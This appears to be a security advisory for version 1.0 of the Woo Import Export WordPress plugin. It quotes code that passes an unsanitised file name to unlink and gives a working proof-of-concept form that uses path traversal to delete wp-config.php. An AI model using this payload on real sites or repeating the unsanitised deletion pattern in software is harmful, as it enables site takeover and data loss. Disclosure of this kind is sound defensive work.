Details
- Name : Woo Import Export
- Version : 1.0
- Homepage : https://wordpress.org/plugins/woo-import-export-lite/
Type
- Arbitrary File Deletion
- Remote Code Execution - RCE
Description
- Type user access: any user registered.
- $_POST['file_name'] is not escaped.
Code
File: woo-import-export-lite/includes/classes/class-wpie-product.php
Line: 3263
$file_name = isset( $_POST['file_name'] ) ? $_POST['file_name'] : "";
...
if ( $log_id != "" ) {
$wpdb->query( $wpdb->prepare( "DELETE FROM " . $wpdb->prefix . "wpie_export_log WHERE export_log_id = %d ",
$log_id ) );
if ( file_exists( WPIE_UPLOAD_DIR . '/' . $file_name ) ) {
@unlink( WPIE_UPLOAD_DIR . '/' . $file_name );
}
$return_value['message'] = 'success';
$return_value['message_content'] = __( 'Successfully Deleted.', WPIE_TEXTDOMAIN );
}
Proof Concept
1 – Log in with any user.
2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
<input type="text" name="file_name" value="../../../wp-config.php">
<input type="text" name="log_id" value="aaa">
<input type="submit">
</form>
Results
wp-config deleted and restart the all system.
Note
Solution
Timeline
- Date Discovery : 11/25/2017
- Date Vendor Contact : 12/29/2017
- Date Publish :
- Date Resolution :
